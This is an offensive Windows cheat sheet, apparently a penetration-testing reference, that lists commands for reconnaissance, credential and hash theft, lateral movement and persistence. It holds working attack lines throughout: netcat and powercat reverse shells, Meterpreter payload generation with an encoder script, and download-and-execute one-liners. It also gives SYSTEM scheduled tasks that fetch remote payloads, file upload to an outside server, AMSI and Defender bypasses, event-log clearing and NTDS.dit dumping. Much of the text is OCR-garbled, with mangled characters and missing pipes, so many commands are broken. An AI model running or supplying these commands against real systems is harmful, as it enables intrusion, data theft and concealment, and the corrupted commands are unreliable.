Windows

Versions

Number or ID

Versions

NT 3.1

Windows NT 3.1 (All)

NT 3.5

Windows NT 3.5 (All)

NT 3.51

Windows NT 3.51 (All)

NT 4.0

Windows NT 4.0 (All)

NT 5.0

Windows 2000 (All)

NT 5.1

Windows XP (Home, Pro, MC, Tablet PC, Starter, Embedded)

NT 5.2

Windows XP (64-bit, Pro 64-bit) Windows Server 2003 & R2 (Standard, Enterprise)

Windows Home Server

NT 6.0

Windows Vista (Starter, Home, Basic, Home Premium, Business, Enterprise, Ultimate)

NT 6.1

Windows 7 (Starter, Home, Pro, Enterprise, Ultimate) Windows Server 2008 R2 (Foundation, Standard, Enterprise)

NT 6.2

Windows 8 (x86/64, Pro, Enterprise, Windows RT (ARM)) Windows Phone 8 Windows Server 2012 (Foundation, Essentials, Standard)

Files

Command

Explanation

%SYSTEMROOT%

Usually C:\Windows

%SYSTEMROOT%\System32\drivers\etc\hosts

DNS Entities

%SYSTEMROOT%\System32\drivers\etc\networks

Network settings

%SYSTEMROOT% system32 config\SAM

Username and password hash

%SYSTEMROOT%\repair\SAM

Copy of SAM

%SYSTEMROOT%\System32\config\RegBack\SAM

Backup copy of SAM

%WINDIR%\system32\config\AppEvent.Evt

Program reports

%WINDIR%\system32\config\SecEvent.Evt

Security reports

%ALLUSERSPROFILE%\Start Menu\Programs\Startup\

Startup path

%USERPROFILE%\Start Menu\Programs\Startup\

Startup path

%SYSTEMROOT%\Prefetch

Path Prefetch (EXE reports)

Launcher paths

For WINDOWS NT 6.1,6.0

# All users
%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
# Specific users
%SystemDrive%\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

For WINDOWS NT 5.2, 5.1, 5.0

%SystemDrive%\Documents and Settings\All Users\Start Menu\Programs\Startup

FOR WINDOWS 9x

%SystemDrive%\wmiOWS\Start Menu\Programs\Startup

for WINDOWS NT 4.0, 3.51, 3.50

%SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\Startup

System information commands

Command

Explanation

version

Operating system version

sc query state=all

Show services

tasklist /svc

Show process and services

tasklist /m

Show all processes and dlls

tasklist /S ip /v

Remotely running processes

taskkill /PID pid /F

Forced removal of the process

systeminfo /S ip /U domain\user /P Pwd

Receive system information remotely

reg query \ ip \ RegDomain \ Key /v VALUE

Send a query to the registry, /s=all values

reg query HKLM /f password /t REG_SZ /s

Registry search for passwords

reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate

WSUS address

fsutil fsinfo drives

List of drivers • need admin access

dir /a /s /b c:'.pdf’

Search for all pdf files

dir /a /b c:\windows\kb’

Search for patches

findstr /si password’ .txt I •.xmll •.xls

Search files for passwords

tree /F /A c: tree.txt

List of folders on drive C:

reg save HKLM\Security security.hive

Save security hives inside the file

echo %USERNAME%

Current user

whoami /priv

Current user permissions

command net/domain

Command

Description

net view /domain

Current domain host

net view /domain: [MYDOMAIN]

hosts in [MYDOMAIN]

net user /domain

All users of the current domain

net user user pass /add

Add user

net localgroup "Administrators" user /add

Add user to Administrators

net accounts /domain

Domain password policies

net localgroup "Administrators"

List of Local Admins

net group /domain

List of domain groups

net group "Domain Admins" /domain

List of Admin users in the domain

net group "Domain Controllers" /domain

List of DCs for the current domain

net share

SMB share

net session I find I "\"

List of active SMB sessions

net user user /ACTIVE:yes /domain

Open domain domain

net user user '' newpassword '' /domain

Change domain username and password

net share share c:\share

/GRANT:Everyone,FULL

Shared folder

Remote commands

Command

Description

tasklist /S ip /v

Processes running on ip

systeminfo /S ip /U domain\user /P Pwd

IP information

net share \\ ip

ip environment

net use \\ ip

ip system file

net use z: \\ ip \share password

/user: DOMAIN user

Map drive, specified

credentials

reg add \\ ip \ regkey \ value

Added registry key for ip

sc \\ ip create service

binpath=C:\Windows\System32\x.exe start=auto

Create a remote service

(space after start=)

cmd.exe /c certutil -urlcache -split -f http://ip/nc.exe c:/windows/temp/nc.exe

Copy file from ip to current system by cmd.exe

cmd.exe /c c:/windows/temp/nc.exe ip port -e cmd.exe

Shell reverse

nc.exe -lvvp port

Listening on specific port

python3 -m http.server port

Create webserver

xcopy /s \\ ip \dir C:\local

Copy of ip fodder

shutdown /m \\ ip /r /t 0 /f

restart system with ip

Network commands

Command

Description

ipconfig I all

ip settings

ipconfig /displaydns

DNS cache

netstat -ana

Show connection

netstat -anop tcp 1

Create Netstat loop

netstat -ani findstr LISTENING

Ports in use

route print

Route tables

arp -a

Get system MACs (using ARP table)

nslookup, set type=any, ls -d domain

results.txt, exit

Get DNS Zone Xfer

nslookup -type=SRV _www._tcp.url.com

Get Domain SRV lookup (ldap, kerberos, sip)

tftp -I ip GET remotefile

File Transfer in TFTP

netsh wlan show profiles

Profiles stored on the wireless network

netsh firewall set opmode disable

Firewall deactivation ('Old)

netsh wlan export profile folder=. key=clear

wifi extraction in plaintext

netsh interface ip show interfaces

List of IDs/MTUs related to interfaces

netsh interface ip set address local static

ip nmask gw ID

Set IP

netsh interface ip set dns local static ip

DNS server configuration

netsh interface ip set address local dhcp

Set interface to use DHCP

Functional commands

Command

Description

type file

Show file contents

del path \' .• /a /s /q /f

Delete files in current path

find /I ''str'' filename

command I find /c /v ""

List of cmd outputs

at HH:MM file [args] (i.e. at 14:45 cmd /c)

File execution schedule

runas /user: user " file [args]"

Execute file with specific user

restart /r /t 0

Restart

sc stop UsoSvc

Stop the UsoSvc service

sc start UsoSvc

Starting the UsoSvc service

sc config UsoSvc binpath="c:\windows\temp\nc.exe ip port -e C:\windows\system32\cmd.exe"

Change path of executable file by UsoSvc

tr -d '\15\32' win.txt unix.txt

Delete CR & 'Z ('nix)

makecab file

Compression

Wusa.exe /uninstall /kb: ###

Delete patch

cmd.exe "wevtutil qe Application /c:40

/f:text /rd:true"

Using the Event Viewer in the CLI

lusrrngr.msc

Using Local user manager

services.msc

Using Services control panel

taskmgr.exe

Using Task manager

secpool.rnsc

Using Security policy manager

eventvwr.rnsc

Using Event viewer

MISC. commands

Locking the workstation

rundll32.dll user32.dll LockWorkstation

Disable Windows Firewall

netsh advfirewall set currentprofile state off netsh advfirewall set allprofiles state off

Create port forward (*need admin access)

netsh interface portproxy add v4tov4 listenport=3000 listenaddress=l.l.l.l connectport=4000 connectaddress=2.2.2.2
#Remove
netsh interface portproxy delete v4tov4 listenport=3000 listenaddress=l.l.l.l

enable cmd

reg add HKCU\Software\Policies\t1icrosoft\Windows\System /v DisableCHD /t REG DWORD /d 0 /f

PSEXEC command

Remote file execution with specific identity information

psexec /accepteula \\ targetiP -u domain\user -p password -c -f \\ smbiP \share\file.exe

Execution of command with special hash

psexec /accepteula \\ ip -u Domain\user -p Lt1 c:\Program-1

Run the command on the remote system

psexec /accepteula \\ ip -s cmd.exe

Terminal service (RDP)

Start RDP

Create regfile.reg file with following line in it: HKEY LOCAL t1ACHINE\SYSTEH\CurrentControlSet \Control\ TerminalService 
"fDenyTSCo~nections"=dword: 00000000
reg import reg file. reg 
net start ''terrnservice'' 
sc config terrnservice start= auto 
net start terrnservice 

    --OR--
reg add "HKEY LOCAL t1ACHINE\SYSTEH\CurentControlSet\Control \Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

RDP tunnel from port 443 (need to restart the terminal service)

REG ADD "HKLt1\System\CurrentControlSet\Control \Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 443 /f

Remove network authentication by adding an exception in the firewall

reg add "HKEY LOCAL t1ACHINE\SYSTEt1\CurentControlSet\Control \Terminal
Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f 

netsh firewall set service type = remotedesktop mode = enable

Import task from XML file

schtasks.exe /create /tn t1yTask /xml "C:\MyTask.xml" /f

WMIC command

Command

Description

wmic [alias] get /?

List of all features

wmic [alias] call /?

Callable method

wmic process list full

process properties

wmic startupwmic service

start wmic service

wmic ntdomain list

Domain and DC information

wmic qfe

List of all patches

wrnic process call create "process_name"

Run process

wmic process where name="process" call

terminate

Delete process

wmic logicaldisk get description,name

Display logical sharing environment

wmic cpu get DataWidth /format:list

Show 32-bit or 64-bit version of the system

wmic service where started = true get name, startname

Show running services

WMIC [alias] [where] [clause]

[alias] == process, share, startup, service, nicconfig, useraccount, etc. 
[where] ==where (name="cmd.exe"), where (parentprocessid!=[pid]"), etc. 
[clause] ==list [fulllbrief], get [attribl, attrib2], call [method], delete

Run the file in smb with specific identity information

wmic /node: targetiP /user:domain\user /password:password process call create "\ \ smbiP \share\evil.exe"

Remove the software

wmic product get name /value # Get software names 
wmic product where name="XXX" call uninstall /nointeractive

Remote user access

wmic /node:remotecomputer computersystern get username

Show processes in real time

wmic /node:machinename process list brief /every:l

Start RDP

wmic /node:"machinename 4" path Win32_TerminalServiceSetting where 
AllowTSConnections=''O'' call SetAllowTSConnections ''1''

The list of times that the user has entered

wmic netlogin where (name like "%adm%") get numberoflogons

Search services for unquoted routes

wmic service get narne,displayname,pathnarne,startrnode 
| findstr /i nauton | findstr /i /v "C:\windows\\" | findstr /i /v """

Copy of Volume shadow

1. wmic /node: DC IP /user:"DOI1AIN\user" /password:"PASS" process 
   call create "cmd /c vssadmin list shadows 2 &1 
   c:\temp\output.txt" 
# If any copies alread1 ex~st then exfil, otherwise create using 
following commands. Check output.txt for anJ errors 
2. wmic /node: DC IP /user:"DOMAIN\user" /password:"PASS" process 
   call create "cmd /c vssadmin create shadow /for=C: 2 &1 
   C:\temp\output.txt" 
3. wmic /node: DC IP /user:"DOMAIN\user" /password:"PASS" process 
   call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVol~meShadowCopy1\Windows\System32\co nfig\SYSTEM 
   C:\temp\system.hive 2 &1  
   C:\temp\output.txt" 
4. wmic /node: DC IP /user: "DOl'.llUN\user" /password: "PASS" process call create ''cmd /c copy 
   \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyc\NTDS\NTDS.dit 
   C:\temp\ntds.dit 2 &1 C:\temp\output.txt" 
Step by step instructions on room362.com for step below 
5. From Linux, download and run ntdsxtract and libesedb to export 
   hashes or other domain information 
   a. Additional instructions found under the VSSOWN section 
   b. ntdsxtract - http://www.ntdsxtract.com 
   c. libesedb - http://code.google.com/p/libesedb/

POWERSHELL environment

Command

Description

stop-transcript

Stop recording

get-content file

Display the contents of the file

get-help command-examples

Display sample command

get-command ‘string’

Search for cmd

get-service

Show services (stopservice, start-service)

get-wmiobject -class win32 service

Show services with the same identity information

$PSVersionTable

Show powershell version

powershell.exe -version 2.0

Run powershell 2.0 from version 3.0

get-service measure-object

Information returned from the service

get-psdrive

List returned from PSDrives

get-process select -expandproperty name

show names

get-help ‘-parameter credential

Receive identity information

get-wmiobject -list -‘network’

WMI available on the network

(Net.DNS]: :GetnostEntry(” ip “I

Process DNS Lookup

powershell.exe wget “http://10.10.10.10/nc.exe” -outfile “c:\temp\nc.exe”

Download and save the file

poweshell.exe -c “IEX (New-Object System.Net.WebClient).DownloadString(‘http://10.10.10.10:8000/powercat.ps1’); powercat -c 10.10.10.100 -p 4444 -e cmd

reverse loose

https://gist.githubusercontent.com/zhilich/b8480f1d22f9b15d4fdde07ddc6fa4ed/raw/8078a51bbfa18df36d8e890fefe96a06891dd47d/SimpleHttpServer.ps1

Web server with port 8050

https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1

Use mimikatz

call ps1 files

Import-Module .\Invoke-Mimikatz.ps1

Download and save the file iwr -uri http://10.10.10.10/file -o file.exe

Bypass AMSI

Import-Module .\Invoke-Obfuscation\Invoke-Obfuscation.psm1
Out-ObfuscatedTokenCommand -Path .\powerview.ps1 | Out-File out

https://raw.githubusercontent.com/kmkz/Pentesting/master/AMSI-Bypass.ps1
. .\AMSI-Bypass.ps1
Invoke-AmsiBypass

Disable realtimemonitoring

powershell -command set-mpppreference -Disable realtimemonitoring $true

List of all users

$users = New-Object DirectoryServices.DirectorySearcher
$users.Filter = "(&(objectclass=user))"
$users.SearchRoot = ''
$users.FindAll()

List of all domains

$computers = New-Object DirectoryServices.DirectorySearcher
$computers.Filter = "(&(objectclass=computer))"
$computers.SearchRoot = ''
$computers.FindAll()

Get AD credentials using donotrequirepreauth

Set-ADAccountControl -identity jorden -doesnotrequirepreauth 1

Deleting security reports and programs (for SVR01)

Get-EventLog -list 
Clear-EventLog -logname Application, Security -computername SVR01

Extract the version of the operating system inside the CSV file

Get-WmiObject -class win32 operatingsystem | select -property ' | 
export-csv c:\os.txt

List of running services

Get-Service | where_object {$_.status -eq "Running"}

New-PSJrive -Persist -PSProvider FileSjstem -Root \\1.1.1.1\tools -Name i

Files written on 8/20

Get-Childitem -Path c:\ -Force -Rec~rse -Filter '.log -ErrorAction
SilentlyContinue | where {$_.LastWriteTime -gt "2012-08-20"}

Get file from http

(new-object sjstem.net.webclient).downloadFile(''url'',''dest'')

tcp port connections (scanner)

$ports=(#,#,#) ;$ip="x.x.x.x";foreach ($port in $ports) {try
($socket=New-object Sjstem.Net.Sockets.TCPClient($ip,$port); }catch(};
if ($socket -eq $NULL) (echo $ip":"$port"- Closed";}
else(echo $ip":"$port"- Open";$socket =$NULL;}}

Ping command with 500 millisecond timeout

$ping = New-Object Sjstex.Net.Networkinformation.ping
$ping.Send(''ip'',5JO)

Basic authentication window

powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass
$Host.UI.PromptForCredential(" title "," message "," user" "," domain")

Run the exe file (from cmd.exe) every 4 hours between August 8-11, 2013, device 0800-1700

powershell. exe -Command "do {if ((Get-Date -format yyyyMMdd-HHmm) -match
'201308 ( 0 [ 8-9] |1 [0-1])-(0[ 8-9]]|1 [ 0-7]) [ 0-5] [ 0-9]') {Start-Process -
WindowStyle Hidden "C:\Temp\my.exe";Start-Sleep -s 14400))while(1)"

Run Powershell as

$pw ~ convertto-securestring -string "PASSWORD" -asplaintext -force;
$pp ~ new-object -typename System.Management.Automation.PSCredential -
argument list "DOMAIN\user", $pw;
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command
&{Start-Process file.exe -verb runas)'

Upload with powershell

𝑝𝑜𝑤𝑒𝑟𝑠ℎ𝑒𝑙𝑙 𝑖𝑤𝑟 − 𝑢𝑠𝑒𝑏𝑎𝑠𝑖𝑐𝑝𝑎𝑟𝑠𝑖𝑛𝑔 ℎ𝑡𝑡𝑝://192.168.2. 𝑥/𝑆ℎ𝑎𝑟𝑝𝐻𝑜𝑢𝑛𝑑. 𝑒𝑥𝑒 − 𝑂𝑢𝑡𝐹𝑖𝑙𝑒 − 𝑆ℎ𝑎𝑟𝑝𝐻𝑜𝑢𝑛𝑑. 𝑒𝑥e

Email sender

powershell.exe Send-l-1ai1Hessage -to "email" -from "email" -subject
"Subject" -a "attachment file path" -body "Body" -SmtpServer Target
Email Server IP

Activating remote access to powershell (requires identity information)

net time \\ip
at \\ip time "Powershell -Command 'Enable-PSRemoting -Force'"
at \\ip time+1 "Powershell -Command 'Set-Item
wsman:\localhost\client\trustedhosts ''"
at \ \ip time+2 "Powershell -Command 'Restart-Service WinRM'"
Enter-PSSession -ComputerName ip -Credential username

hostname and ip list for all domains

Get-WmiObject -ComputerName DC -Namespace root\microsoftDNS -Class 
MicrosoftDNS _ ResourceRecord -Filter "domainname~' DOMAIN '" | select 
textrepresentation

Download from Powershell from specific path

powershell.exe -noprofile -noninteractive -command 
"[System.Net.ServicePointManager] ::ServerCertificateValidationCallback = 
{$true); $source="""https:ll YOUR SPECIFIED IP I file.zip """; 
$destination="C:\rnaster.zip"; $http = new-object Systern.Net.WebClient;
$response= $http.DownloadFile($source, $destination);"

Display Powershell data

Script will send a file ($filepath) via http to server ($server) via POST request. 
Must have web server listening on port designated in the $server
 
powershell.exe -noprofile -noninteractive -command 
"[S;stem.Net.ServicePointManager] ::ServerCertificateValidationCallback = 
{$true); $server="""http:// YOUR_SPECIFIED IP / folder """;
$filepath="C:\master.zip" $http= new=object System.Net.WebClient;
$response= $http.UploadFile($server,$filepath);"

Using powershell to run meterpreter from memory

Need Metasploit v4.5+ (msfvenom supports Powershell) 
Use Powershell (x86) with 32 bit Meterpreter payloads 
encodeMeterpreter.psl script can be found on next page

in the attacking system

1. ./msfvenom -p Wlndows/meterpreter/reverse https -f psh -a x86 LHOST=1.1.1.1 LPORT=443 audit.psl 
2. Move audit.psl into same folder as encodeMeterpreter.psl 
3. Launch Powershell (x86) 
4. powershell.exe -executionpolicy bypass encodeMeterpreter.psl 
5. Copy the encoded Meterpreter string

Start the listener in the attacking system

1. ./msfconsole 
2. use exploit/multi/handler 
3. set payload windows/meterpreter/reverse https 
4. set LHOST 1. 1. 1. 1 
5. set LPORT 443 
6. exploit -j

On the target system (run powershell(x86))

1. powershell. exe -noexi t -encodedCommand paste encoded Meterpreter 
string here 
PROFIT

Encodemeterpreter.ps1 [7]

# Get Contents of Script
$contents = Get-Content audit.psl
# Compress Script
$ms = New-Object IO.MemoryStream
$action = [IO.Compression.CompressionMode]: :Compress
$cs =New-Object IO.Compression.DeflateStream ($ms,$action)
$sw =New-Object IO.StreamWriter ($cs, [Text.Encoding] ::ASCII)
$contents I ForEach-Object {$sw.WriteLine($ I)
$sw.Close()
# Base64 Encode Stream
$code= [Convert]: :ToBase64String($ms.ToArray())
$command= "Invoke-Expression '$(New-Object IO.StreamReader('$(New-Object
IO. Compression. DeflateStream ('$(New-Object IO. t4emoryStream
(, '$ ( [Convert] : : FromBase64String ('"$code'") ) I I ,
[IO.Compression.Compressiont~ode]: :Decompress) I,
[Text.Encoding]: :ASCII)) .ReadToEnd() ;"
# Invoke-Expression $command
$bytes= [System.Text.Encoding] ::Unicode.GetBytes($command)
$encodedCommand = [Convert]: :ToBase64String($bytes)
# Write to Standard Out
Write-Host $encodedCommand

Using powershell to start meterpreter (second method)

On bt attack box

1. msfpayload windows/rneterpreter/reverse tcp LHOST=10.1.1.1
LPORT~8080 R I msfencode -t psh -a x86

in the attacking system

1. c:\powershell
2. PS c:\ $cmd = 'PASTE THE CONTENTS OF THE PSH SCRIPT HERE'
3. PS c:\ $u = [System.Text.Encoding]: :Unicode.GetBytes($crnd)
4. PS c: \ $e = [Convert] ::ToBase64String($u)
5. PS c:\ $e
6. Copy contents of $e

Start the listener in the attacking system

1. ./msfconsole
2. use exploit/multi/handler
3. set payload windows/meterpreter/reverse tcp
4. set LHOST 1.1.1.1
5. set LPORT 8080
6. exploit -j

In the target system (1: download the shell code, 2: execute)

1. c: \ powershell -noprofile -noninteracti ve -command " &
     {$client=new-object
     System.Net.WebClient; $client.DownloadFile('http://1.1.1.1/shell.txt
     ', 'c:\windows\temp\shell.txt') )"
2. c: \ powershell -noprofile -noninteracti ve -noexi t -command " &
     {$crnd~tjpe 'c:\windows\temp\shell.txt';powershell -noprofilenoninteractive
     -noexit -encodedCornmand $cmd} "
PROFIT

Identification of vulnerable domains with powerup

https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1
. .\PowerUp.ps1

Windows registry

operating system information

HKLM\Software\Microsoft\Windows NT\CurrentVersion

Product Name

HKLM\Software\Microsoft\Windows NT\CurrentVersion /v
ProductNarne

Installation Date

HKLM\Software\Microsoft\Windows NT\CurrentVersion /v InstallDate

registered name

HKLM\Software\Microsoft\Windows NT\CurrentVersion /v RegisteredOwner

System boot information

HKLM\Software\~icrosoft\Windows NT\CurrentVersion /v SystemRoot

Time zone information (in minutes from UTC)

HKLM\System\CurrentControlSet\Control\TimeZoneinformation /v ActiveTirneBias

Map of network drivers

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive
MRU

Mounted devices

HKLM\System\MountedDevices

usb devices

HKLM\System\CurrentControlSet\Enurn\USBStor

Activation of IP forwarding

HKEY_LOCAL_~ACHI~E\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters -
IPEnableRouter = 1

Password keys: LSA secret cat certain vpn, autologon, other passwords

HKEY LOCAL MACHINE\Security\Policy\Secrets
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\autoadminlogon

Audit policy information

HKLM\Security\Policy\PolAdTev

Kernel and user services

HKLM\Software\Microsoft\Windows NT\CurrentControlSet\Services

software installed in the system

HKLM\Software

Installed software for the user

HKCU\Software

Latest documents

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs

The last positions of the user

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisite
dtmu & \Opensavetmu

URLs typed

HKCU\Software\Microsoft\Internet Explorer\TypedURLs

MRU lists

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

The last registry key used

HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\RegEdit /v LastKeY

Launch paths

HKLM\Software\Microsoft\Windows\CurrentVersion\Run & \Runonce
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run & \Runonce
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load & \Run

Activation of Remote Desktop

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0

Get Windows information with dsquery

List of domain users

dsquery user -limit 0

List of domain groups domain=victim.com

dsquery group "cn=users, dc=victim, dc=com"

List of domain administrators

dsquery group -name "domain admins" | dsget group -members -expand

List of user groups

dsquery user -name bob | dsget user -memberof -expand

Get the entered user id

dsquery user -name bob | dsget user -samid

List of users who have not been active in the last two weeks

dsquery user - inactive 2

Add user

dsadd user "CN=Bob,CN=Users,DC=victim,DC=com" -samid bob -pwd bobpassdisplaj
"Bob" -pwdneverexpires yes -memberof "CN=Domain
Admins,CN=Users,DC=victim,DC=com

Delete user

dsrm -subtree -noprornpt "CN=Bob,CN=Users,DC=victim,DC=com"

List of domain operating systems

dsquery A "DC=victim,DC=com" -scope subtree -attr "en" "operatingSystem"
"operatingSystemServicePack" -filter
" (& (objectclass=computer) (objectcategory=computer) (operatingSystem=Windows}
))"

List of site names

dsquery site -o rdn -limit 0

List of all subnets in the site

dsquery subnet -site sitename -o rdn

List of services in the site

dsquery server -site sitename -or rdn

Get domain servers

dsquery ' domainroot -filter
" (& (objectCategory=Computer) (objectClass=Computer) (operatingSystem='Server'
) ) "-limit 0

DC list of the site

dsquery "CN=Sites,CN=Configuration,DC=forestRootDomain" -filter
(objectCategory=Server)

Script writing

Bash script variables must be placed in the form %% For example %%i

Create ping sweep

for /L %i in (10,1,254) do@ (for /L %x in (10,1,254) do@ ping -n 1 -w 100
10.10.%i.%x 2 nul 1 find "Reply" && echo 10.10.%i.%x live.txt)

Create a loop inside the file

for /F %i in (file) do command

domain brute forcer operation

for /F %n in (names.txt) do for /F %pin (pawds.txt) do net use \\DC01\IPC$
/user: domain \%n %p 1 NUL 2 &1 && echo %n:%p && net use /delete
\\DCOl\IPC$ NUL

account closing(lockout.bat)

@echo Test run:
for /f %%U in (list.txt) do @for /1 %%C in (1,1,5) do @echo net use \\WIN-
1234\c$ /USER:%%U wrong pass

DHCP exhaustion operation

for /L %i
1.1.1.%i
in (2,1,254) do (netsh interface ip set address local static
netrask gw ID %1 ping 127.0.0.1 -n l -w 10000 nul %1)

DNS reverse lookup process

for /L %i in (100, 1, 105)
dns.txt && echo Server:
do @ nslookup 1.1.1.%i I findstr /i /c:''Name''
1.1.1.%i dns.txt

Search all the paths to find the files that contain PASS and display the details of that file

forfi1es /P c:\temp /s /m pass -c "cmd /c echo @isdir @fdate @ftime
@relpath @path @fsize"

Malicious domain simulation (Application for IDS test)

# Run packet capture on attack domain to receive callout
# domains.txt should contain known malicious domains
for /L %i in (0,1,100) do (for /F %n in (domains.txt) do nslookup %n
attack domain NUL 2 &1 & ping -n 5 127.0.0.1 NUL 2 &1

Operation of IE web looper (traffic generator)

for /L %C in (1,1,5000) do @for %U in (www.yahoo.com www.pastebin.com
www.paypal.com www.craigslist.org www.google.com) do start /b iexplore %U &
ping -n 6 localhost & taskkill /F /IM iexplore.exe

Get access to executive services

for /f "tokens=2 delims='='" %a in ('wmic service list full | find /i
"pathname" I find /i /v "system32"') do @echo %a
c:\windows\temp\3afd4ga.tmp
for /f eol = " delims = " %a in (c:\windows\temp\3afd4ga.tmp) do cmd.exe
/c icacls ''%a''

Spinning Reboot (replace /R with /S to shutdown):

for /L %i in (2,1,254) do shutdown /r /m \\1.1.1.%i /f /t 0 /c "Reboot
message"

Create a shell using vbs (requires identity information)

# Create .vbs script with the following
Set shell wscript.createobject("wscript.shell")
Shell.run "runas /user: user " & """" &
C:\Windows\System32\WindowsPowershell\vl.O\powershell.exe -WindowStyle
hidden -NoLogo -Noninteractive -ep bjpass -nop -c \" & """" & "IEX ((New-
Object Net.WEbClieil':).downloadstring(' url '))\" & """" & """"
wscript.sleep(100)
shell.Sendkeys "password" & "{ENTER}"

Scheduling the task

Scheduled tasks binary paths CANNOT contain spaces because everything
after the first space in the path is considered to be a command-line
argument. Enclose the /TR path parameter between backslash (\) AND
quotation marks ("):
... /TR "\"C:\Program Files\file.exe\" -x arg1"

Scheduling the task (ST=start time, SD=start date, ED=end date) *need admin access

SCHTASKS /CREATE /TN Task Name /SC HOURLY /ST HH:MM /F /RL HIGHEST /SD
MM/DD/YYYY /ED MM/DD/YYYY /tr "C:\my.exe" /RU DOMAIN/user /RP
password

Always schedule task [10]

For 64 bit use:
"C:\Windows\syswow64\WindowsPowerShell\vl.O\powershell.exe"
# (x86) on User Login
SCHTASKS /CREATE /TN Task Name /TR
"C:\Windows\System32\WindowsPowerShell\vl.O\powershell.exe -WindowStyle
hidden -NoLogo -Noninteractive -ep bypass -nap -c 'IEX ((new-object
net.webclient) .downloadstring( ''http:// ip : port I payload'''))'' /SC
onlogon /RU System
# (x86) on System Start
SCHTASKS /CREATE /TN Task Name /TR
"C:\Windows\System32\WindowsPowerShell\vl.O\powershell.exe -WindowStyle
hidden -NoLogo -Noninteractive -ep bypass -nap -c 'IEX ((new-object
net.webclient) .downloadstring("http:// ip : port I payload"))'" /SC
onstart /RU System
# (x86) on User Idle (30 Minutes)
SCHTASKS /CREATE /TN Task Name /TR
"C:\Windows\System32\WindowsPowerShell\vl.O\powershell.exe -WindowStyle
hidden -NoLogo -Noninteractive -ep bjpass -nop -c 'IEX ((new-object
net.webclient) .downloadstring("http:// ip : port I payload"))'" /SC
onidle /i 30

Instructions for working with smb

Log in with a specific user

smbclient -L 10.10.10.10 -U tlevel

smbclient -N -L 10.10.10.10

Change password

smbpasswd -r 10.10.10.10 -U tlevel

Show shared route

smbclient -L 10.10.10.10

Show the specified route

smbclient //10.10.10.10/forensic

smbclient //10.10.10.10/profiles$

Get users along with password hash

python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py 10.10.10.10L -usersfile

Guess different smb passwords

with metasploit

msf5 > use auxiliary/scanner/smb/smb_login
set pass_file wordlist
set USER_file users.txt
set RHOSTS 10.10.10.10
run

with medusa

medusa -h 10.10.10.10 -U users.txt -P wordlist -M smbnt

rpcclient commands

entering the system

rpcclient 10.10.10.10 -U support

Show user information

queryuser support

Show users

enumdomusers

Show permissions

enumprivs

Change user access

setuserinfo2 audit2020 23 'redteam'

Show printers

enumprinters

NTLM extraction from ntds.dit file

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -ntds ntds.dit -system system -
hashes lmhash:nthash LOCAL -output nt-hash

Gather information using SharpHound

https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
.\SharpHound.exe
or
SharpHound.exe -c All --zipfilename output.zip

Gather information about Sql Server

https://github.com/NetSPI/PowerUpSQL/blob/master/PowerUpSQL.ps1
. .\PowerUpSQL.ps1
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

Obtain AS-REP Roast hash

https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
.\Rubeus.exe asreproast

List of available ips without using nmap

for /L %i in (1,1,255) do @ping -n 1 -w 200 10.10.10.%i > nul && echo 10.10.10.%i is up.

https://github.com/sperner/PowerShell/blob/master/PortScan.ps1
.\PortScan.ps1
.\PortScan.ps1 10.10.10.10 1 10000

Service identification with Test-WSMan

PS> Test-WSMan -ComputerName <COMPUTERNAME> -Port 6666

Enumerate OU’s

𝐺𝑒𝑡 − 𝑁𝑒𝑡𝑂𝑈 − 𝑣𝑒𝑟𝑏𝑜𝑠𝑒

Retrieve users in ‘ICS’ OU

𝐺𝑒𝑡 − 𝐷𝑜𝑚𝑎𝑖𝑛𝑈𝑠𝑒𝑟 − 𝑆𝑒𝑎𝑟𝑐ℎ𝐵𝑎𝑠𝑒 "𝐿𝐷𝐴𝑃://𝑂𝑈 = 𝐼𝐶𝑆,𝐷𝐶 = 𝑛𝑢𝑐𝑙𝑒𝑎𝑟,𝐷𝐶 = 𝑠𝑖𝑡𝑒" − 𝑉𝑒𝑟𝑏𝑜𝑠𝑒

SharpHound Collect

SharpHound.exe --CollectionMethod all

Impersonate Token of nuclear\vdadmin (on psexec session)

𝑖𝑛𝑐𝑜𝑔𝑛𝑖𝑡𝑜. 𝑒𝑥𝑒 𝑙𝑖𝑠𝑡_𝑡𝑜𝑘𝑒𝑛𝑠 −u 
𝑖𝑛𝑐𝑜𝑔𝑛𝑖𝑡𝑜. 𝑒𝑥𝑒 𝑒𝑥𝑒𝑐𝑢𝑡𝑒 − 𝑐 "𝑁𝑈𝐶𝐿𝐸𝐴𝑅\𝑣𝑑𝑎𝑑𝑚𝑖𝑛" 𝐶:\𝑈𝑠𝑒𝑟𝑠\𝑃𝑢𝑏𝑙𝑖𝑐\𝑏𝑖𝑛𝑎𝑟𝑦.𝑒𝑥e

